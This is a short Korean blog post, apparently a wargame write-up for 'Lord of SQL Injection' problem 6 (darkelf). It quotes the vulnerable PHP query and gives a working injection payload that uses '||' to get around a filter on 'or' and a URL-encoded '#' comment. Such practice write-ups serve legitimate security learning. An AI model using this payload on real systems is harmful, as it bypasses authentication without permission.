los 6 문제 풀이
$query = "select id from prob_darkelf where id='guest' and pw='{$_GET[pw]}'";쿼리를 보면 id가 게스트로 고정되있고 pw를 전송하는것같습니다.
if($result['id'] == 'admin') solve("darkelf");id가 admin이 되어야 풀리는 문제인거같습니다.
일단 이문제를 어떻게 푸냐면 id가 게스트로 되어있기 때문에 저는
or이 필터링 되있기때문에 ||로 우회 하였습니다.
?pw=1'||id='admin'%23을 써주엇더니 풀리었습니다 %23을쓰는이유는 게스트를 지우기위해서인것같습니다
답 : ?pw=1'||id='admin'%23
'los 문제' 카테고리의 다른 글
| los #8 troll 문제풀이 (1) | 2022.07.31 |
|---|---|
| los #7 orge 풀이 (0) | 2022.07.31 |
| LOS 5번 문제 풀이 (0) | 2021.09.10 |
| LOS 4번 문제 풀이 (0) | 2021.09.08 |
| LOS 3번 문제 풀이 (0) | 2021.09.08 |